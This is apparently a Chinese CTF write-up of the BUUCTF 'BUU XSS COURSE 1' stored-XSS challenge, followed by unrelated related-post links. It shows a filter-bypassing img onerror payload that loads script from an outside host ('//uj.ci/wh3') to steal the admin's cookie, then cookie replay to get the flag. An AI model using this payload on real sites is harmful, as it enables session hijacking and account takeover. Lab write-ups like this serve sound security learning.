104,【4】 buuctf web [3.3.4 案例分析]BUU XSS COURSE 1

进入靶场

随便提交看看

访问此路径

知道这是存储型xss注入

开始xss注入

试试<script>alert('xss')</script>

不行,是把script过滤了

换一个

<img src=# onerror=alert(1)>

可以

寻找平台,创建项目

https://xssjs.com/

选择超强默认模式

之前测试img可以成功传入,所以选择这个

复制代码
<img src=x onerror=s=createElement('script');body.appendChild(s);s.src='//uj.ci/wh3';>

记录cookie和url

先改url

显示没登陆是因为cookie没改

f12修改cookie

成功得到flag

我以为和早上的那道题肯定有点区别,可能是plus版,结果就是同一个题。。。。。。。。

相关推荐
河畔一角3 分钟前
一些感悟
前端
excel9 分钟前
理解 JavaScript 中的 for...in 与 for...of 的区别
前端
前端小巷子39 分钟前
Webpack 5模块联邦
前端·javascript·面试
玲小珑42 分钟前
Next.js 教程系列(十九)图像优化:next/image 与高级技巧
前端·next.js
晓得迷路了42 分钟前
栗子前端技术周刊第 91 期 - 新版 React Compiler 文档、2025 HTML 状态调查、Bun v1.2.19...
前端·javascript·react.js
江城开朗的豌豆1 小时前
Vue和React中的key:为什么列表渲染必须加这玩意儿?
前端·vue.js·面试
江城开朗的豌豆1 小时前
前端路由傻傻分不清?route和router的区别,看完这篇别再搞混了!
前端·javascript·vue.js
pengzhuofan1 小时前
Web开发系列-第0章 Web介绍
前端
小鱼人爱编程1 小时前
Java基石--反射让你直捣黄龙
前端·spring boot·后端
JosieBook3 小时前
【web应用】如何进行前后端调试Debug? + 前端JavaScript调试Debug?
前端·chrome·debug